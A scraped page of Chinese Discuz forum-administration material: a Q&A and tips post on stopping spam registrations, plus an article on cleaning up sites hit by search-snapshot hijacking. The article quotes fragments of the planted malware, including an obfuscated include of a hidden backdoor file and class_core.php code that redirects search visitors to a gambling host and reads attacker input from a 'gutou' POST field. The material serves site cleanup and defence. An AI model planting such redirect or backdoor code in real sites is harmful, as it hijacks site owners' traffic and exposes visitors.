discuzX2.5的论坛被恶意注册并发布大量垃圾信息_百度知道
discuzX2.5的论坛被恶意注册并发布大量垃圾信息
每天都有更新，删都删不掉，在网上找的一些方法,但discuz好像都没有register.php这个文件啊！求解！这么多删都删不完啊不是等待验证会员么？怎么还发了那么多帖子
答题抽奖
首次认真答题后
即可获得3次抽奖机会，100%中奖。
升级或封IP
升级能解决吗？还有ip都不一样啊 怎么封
一、注册于访问控制操作：Discuz！X2.5管理后台-&全局-&注册与访问控制会员注册策略设置：1、新用户注册验证（建议使用Email验证，前提是需要有邮局）2、同一IP注册间隔限制（小时）3、统一IP在24小时允许注册的最大次数访问控制设置新手见习期限（分钟）控制，这里是设置新注册用户多久后才可以发帖。强烈建议设置。二、防灌水设置操作：Discuz！X2.5管理后台-&全局-&防灌水设置防灌水基本设置1、两次发表时间间隔（秒）2、强制用户验证激活邮箱3、强制用户上传头像（建议强制用户上传头像）验证码设置（建议启用下列）1、新用户注册2、发表信息验证回答设置1、新用户注册（建议启用）2、发表信息（建议启用）3、验证问题及答案设置（建议设置这样可以防止注册机注册会员）
采纳率：37%
为您推荐：
其他类似问题
您可能关注的内容
恶意注册的相关知识
换一换
回答问题，赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。今日: 163|昨日: 153|帖子: 215504|会员: 41118|欢迎新会员:
火绒安全软件4.0，以精准威胁情报驱动的理念全新开发的新一代终端安全软件。
如果您是企业用户（网管）欢迎向我们提出您在日常会遇到的企业安全问题以及希望拥有的功能。
前天&17:03
安全工具包含了火绒剑，垃圾清理，右键管理和文件粉碎等等；欢迎向我们提出对小工具的建议和问题反馈。
产品公告区会发布每一个版本的更新公告。
昨天&22:08
欢迎在此反馈无法被系统防御以及网络防御拦截的程序恶意行为以及网络入侵问题，工程师将跟进处理。
火绒安全实验室将不定期在火绒安全播报区发布当前用户可能存在的安全威胁以及病毒分析报告。
昨天&18:41
欢迎在此讨论安全热点问题、安全趋势、反病毒技术、安全体系等安全技术话题。
昨天&21:54
反浏览器“首页篡改”治理专区，您提问题我们分析处理，斩断侵权软件伸向广大PC用户的黑手。
新闻资讯版有你才精彩，大家可以这里分享你喜欢的新闻资讯，同时在这里了解现在的科技新闻，安全资讯等等。
在粉丝茶话区可以自由的分享讨论自己的生活趣事，以及时下的安全趋势，社会热点，将这里作为大家的聊天休息的咖啡小站。
规则分享区供热爱自定义规则的玩家学习和分享自定义规则，网址黑名单，反广告规则，一起打造最强防御。
大家可以在电脑问题解答区向我们提出所遇到的电脑故障问题，我们和热心的用户将尽力为大家解决。后使用快捷导航没有帐号？
彻底解决discuz挂马、搜索引擎快照劫持、网页跳转问题
彻底解决discuz挂马、搜索引擎快照劫持、网页跳转问题
来源：作者：发布时间： 20:41阅读量：356
摘要: 一、网站被挂马 搜索引擎快照被劫持 网页被跳转如果你的网站被劫持到一些非法站点上导致网站被标记为非法、赌博时，可能直接会被各种浏览器和搜索引擎标记为“恶意网站”从而直接拦截。世间最痛苦的事莫过于此，特么 ...==============
一、网站被挂马 搜索引擎快照被劫持 网页被跳转如果你的网站被劫持到一些非法站点上导致网站被标记为非法、赌博时，可能直接会被各种浏览器和搜索引擎标记为“恶意网站”从而直接拦截。世间最痛苦的事莫过于此，特么的被人阴了...苦心经营网站多年，树立口碑不容易。一日被黑，日日被劫持。从此以后用户通过搜索引擎打开你的网站不是色情就是赌博。正常业务啥都没了，也别再谈什么可信度和口碑了。网站被收录与网站无关且违禁的博彩关键词，如果处理不及时，措施不当等待你的将是搜索引擎的惩罚：网站排名与权重下降，轻则不收录重则被k。二、站长们苦恼的问题网站被挂马该怎么解决？网站挂马的解决方法、网站被挂马怎么排查？网站老是被黑被挂马是什么原因？如何检测网站被挂马？网站快照被劫持怎么办？搜索引擎劫持怎么解决？百度快照被篡改劫持怎么回事？360快照被劫持怎么解决？discuz（DZ）被挂马快照被劫持的解决办法？dz论坛被挂马、怎么防范？网页被跳转到博彩页面怎么办？诸如此类的问题不在罗列实在是太多了，下面就解决你的疑问！三、挂马原理分析、搜索跳转其实是黑帽SEO利用站中站脚本自动繁殖文章“能熟练应用快照劫持(流量、爬虫、权重) 搜索跳转到自动繁殖文章（站中站脚本）做自己关键词获取定向流量的方法”搜索引擎快照劫持是通过代码来判断和识别蜘蛛访问的，若正常访问，则给出正常内容，若判断到是搜素引擎来访问，就给出另一个页面，使搜素引擎抓取快照进行改变，之后判断来路跳转。[快照劫持挂马方法] 多为下面两种方式实现其劫持功能第一种：放在上html声明内引导劫持快照这种劫持要比放在源码中更加高明难以发现，查看源码是看不到任何痕迹的。第二种：利用字典文件繁殖文章使用include引用并提交给搜索引擎实施劫持字典文件是一些关键词文件为文章生成提供资源，生成劫持静态文件放到要引用的文件中，根据SEO知识可知一般目录都不会太深，比较深的一般会有sitemap文件放在根目录引导蜘蛛爬取，平时注意下你的目录下sitemap.txt是否被篡改。第一种是最简单粗暴的加到页面header文件里面引导蜘蛛。第二种相对更加隐蔽些，只需在Include中加上劫持目录即可。Include引用代码：@include($_SERVER[‘DOCUMENT_ROOT’].PACK('H*','2F2F30'));【处理方法】解密代码：2F2F30 解蜜后为：/data/sysdata/0查看此目录找到并清理木马文件。问题一：DZ论坛挂马常被反复篡改的文件function_core.php、discuz_application.php、class_core.php、config_global.php注意排查。一定有很多站长会遇到这个问题，不论怎么修改FTP密码，换服务器...class_core.php文件还是反复被挂马，class_core.php文件反复被挂马什么原因？一会是class_core.php被修改，一会是config_global.php被修改。那是因为木马后门已经扎根在你cms程序内部了，会时刻被唤醒使用。class_core.php常被插入劫持以上部分代码，就是第一种html声明劫持。查看源码看不到任何信息，只能抓取诊断。为防恶意使用，仅贴出部分代码。error_reporting(0);$S9 = explode("|",_decode('NTguMjQ3fDE4MC4xNTZ8MTgwLjE1NnwxMTcuMTc3fDU5LjE3MnwxNzEuODN8MTE0LjgyfDYxLjE3Mg=='));问题二：网站快照被劫持解决方法1、进discuz后台找到工具-文件校验，找到最近被修改的php文件与源文件对比下。2、dz的文件校验不会检查utility文件夹，除了upload里的文件，其他辅助功能文件一般用不到，如上传了请删除，避免被黑客利用。3、使用后台文件校验看修改文件，UCcenter校验UC文件修改。4、网站目录使用时间排序方式，查看最近修改的文件有没有可疑。5、404态设置到位，可很大程度避免收录不存在的博彩劫持页面。6、看网站目录内有没有被上传的tools目录或tools类型文件。7、要有一查到底的决心，不然很难找到黑客埋藏的根基。8、多方位加强防护，让劫持死于摇篮...问题三：网站被劫持了怎么查看目录变化站长们要学会从侧面发现快照劫持，不要仅仅在百度一个搜索引擎内site，要在多个搜索引擎内site，这样可以利用搜索引擎侧面检测反应网站快照劫持问题，只要有一个有劫持问题，就说明你网站一定被挂马了。并不是所有的搜索引擎都在同一时间内被劫持快照的，因为搜索引擎与搜索引擎算法技术的成熟程度是不一样的，还有就是你网站本身与搜索引擎爬虫友好度有关。综上述解决快照劫持的大概步骤：校验文件-修改替换原始文件-设定404-举报/更新快照...加强防范建议：插件不要随便使用，后门很多。问题四：让你们见识下快照劫持字典文件、站中站脚本目录长什么样快照劫持页面内容多为博彩、赌具、特服小姐等黄赌毒违法信息或其他办证，公关小姐类灰色外推行业关键词。搜索引擎快照劫持扩展阅读1、什么是搜索引擎快照劫持？快照劫持：利用网站程序漏洞或爆破ftp，挂马篡改网页信息并主动post提交给搜索引擎，让其抓取收录，快照的内容多为博彩等推广内容。2、搜索引擎快照劫持技术是什么？搜索引擎劫持主要分快照劫持与跳转劫持，就是传说中的黑帽SEO手法快照劫持与流量劫持。其中快照劫持有的直接篡改原始网页挂马劫持，有的再生成新链接或上传大量静态页面挂黄赌毒博彩相关行业推广词；跳转劫持是使用跳转脚本让访问链接跳转到其他指定博彩站页面，主要是提高网站受众群体量与增加网站曝光度。3、最新快照劫持及网页篡改网站入侵挂马问题class_core.php文件插入跳转代码error_reporting(E_ALL);@error_reporting(1);@$ref = strtolower($_SERVER['HTTP_REFERER']);@$jump_ref = explode("|","haoso.|so.|haosou.|google.|soso.");foreach($jump_ref as $r){$r = trim($r);if(stristr($ref,$r)){if($_GET['tid']&50000){header('Location: http://www.xxxxxxxxx.com/?op5u');die();}}}error_reporting(0);set_time_limit(0);$GuTou=@$_POST["gutou"];if($GuTou){$cc="";for($i=0;$i<strlen($gutou);$i+=2)$cc.=urldecode("%".substr($GuTou,$i,2));}?&如何发现被快照劫持了使用语法 关键词 site：语法 【】【官网入口】...discuz被挂马discuz百度快照被劫持的解决方法[DZ挂马]discuz!论坛360快照劫持的处理方法dz论坛被挂马、快照劫持怎么防范？关于dz论坛恶意挂赌博广告的排查心得discuz被挂马_百度快照被劫持的解决办法网站被挂马_各大搜索引擎快照被劫持的处理方法</strlen($gutou);$i+=2)
上一篇：下一篇：
最新图文推荐
(C)&2016版权所有&
3G空间/50G流量/2M带宽
原价49元/年
注册会员领取免费域名
原价15元/年
限时抢：仅1元
群名称：快云交流群下次自动登录
现在的位置:
& 综合 & 正文
新手－－Discuz!使用技巧如何防止用户在论坛恶意灌水？
转自：http://www.mhzc.cn/html/1/12/38/1.htmlDiscuz!使用技巧:如何防止用户在论坛恶意灌水？作者：唐文明1：问：如果有注册机器人在Discuz!论坛上批量注册用户怎么办？答：以管理员身份登入Discuz!后台，依次 “Discuz! 选项 --&安全控制--& 启用验证码”。将“新用户注册”选项前打勾，可有效防止注册机批量注册。另外还可以设置注册限制：“Discuz! 选项--&注册与访问控制--&IP 注册间隔限制(小时) ”在这里设置同一台电脑注册时间的间隔也可有效防止恶意注册。2：问：论坛如何防止论坛恶意批量发帖？答：以管理员身份登入Discuz!后台，在后台设置防止灌水时间：“Discuz! 选项--&安全控制--&发帖灌水预防”，在这里设置两个帖子发表的时间间隔。3：问：如何禁止论坛发表带有敏感字符的帖子？答：以管理员身份登入Discuz!后台设置方法：依次进入后台 - 帖子相关 - 词语过滤 在 不良词语 输入框中填写要过滤的字符。在 替换为 输入框中填写改铭感字符过滤后的替换字符，如 需要过滤 “他妈的”为“TMD”则在 不良词语 输入框中填写 “他妈的”，在 替换为 输入框中填写“TMD”即可。有没有办法让含有某个字符的帖子无法发表呢？可以的。只要在上面选项中的 替换为 输入框中填写 “{BANNED}”，则将该铭感字符设置为不可发表。4：问：如果发广告者在论坛各处发帖，管理员想一次性删除可以吗？答：当然可以。以管理员身份登Discuz!后台，选择“论坛维护--&批量删帖”，在“发帖用户名”一项中填写恶意发帖者ID，点击提交后出现该ID所发表的所有文章，全部打勾或有选择性的批量删除即可。
【上篇】【下篇】Discuz!X3.1-X3.2后台admin.php防止直接恶意访问 &#8211; 吴文辉博客
有回复时邮件通知我
记录自己在学习和工作中的经验总结！
吴文辉博客是一个关注互联网及IT技术发展的独立个人博客，记录自己在学习和工作中的经验总结，是一个值得大家收藏的优秀个人网站！}